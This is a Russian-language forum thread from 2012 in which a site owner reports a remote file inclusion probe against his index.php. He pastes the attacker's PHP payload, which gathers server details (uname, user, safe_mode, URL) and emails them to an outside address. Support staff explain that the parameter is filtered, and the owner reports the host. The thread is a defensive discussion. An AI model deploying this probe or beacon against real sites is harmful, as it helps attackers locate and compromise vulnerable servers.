atpm 0 Опубликовано 13 марта, 2012 Жалоба Share Опубликовано 13 марта, 2012 Не знаю в тот раздел или нет, если нужно перенесите в другой. Похоже пробовали поискать уязвимости. Случайно обнаружил онлайн посетителя с Последний URL = /index.php?cat=http://www.golfer******.co.th/newweb/undefild2.txt? Конечно же я полез посмотреть чего там, в этом undefild2.txt :) А там вот что: <?php ini_set("max_execution_time",-1); set_time_limit(0); $user = @get_current_user(); $UNAME = @php_uname(); $SafeMode = @ini_get('safe_mode'); if ($SafeMode == '') { $SafeMode = "OFF"; } else { $SafeMode = " $SafeMode "; } $delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); $dados=("<b>Produto</b> = " . $UNAME . " <i>Seguran?a</i> = " . $SafeMode . " http://" . $delet . " Muito obrigado por comprar o hehe1 com: <u>delet</u>"); $email = "pacco.rabbanne@gmail.com"; $assunto = "CHEGOU VULLZZ"; $email1 = "pacco.rabbanne@gmail.com"; $headers = "From: <$email>rn"; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; if(mail($email1,$assunto,$dados,$headers)){ echo "Isso, ja foi!"; exit(); } else{ echo "N?o foi."; exit(); } ?> [/CODE] Расскажите плиз мне что это такое и чего пытались выяснить? Можно от моего имени спамить или нет, верно? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 13 марта, 2012 Жалоба Share Опубликовано 13 марта, 2012 По идее, ничего страшного. В браузере откройте эту ссылки, т.е. cat=.... Ничего не должно произойти, значения в cat фильтруются Ссылка на сообщение Поделиться на другие сайты
atpm 0 Опубликовано 13 марта, 2012 Автор Жалоба Share Опубликовано 13 марта, 2012 По идее, ничего страшного. В браузере откройте эту ссылки, т.е. cat=.... Ничего не должно произойти, значения в cat фильтруются Спасибо за быстрый ответ! Да, параметр cat фильтруется я уже проверил. Написал вебмастеру сайта где лежит этот файл, что еще раз и абуза хостеру ;) Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 14 марта, 2012 Жалоба Share Опубликовано 14 марта, 2012 Если что, пишите. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения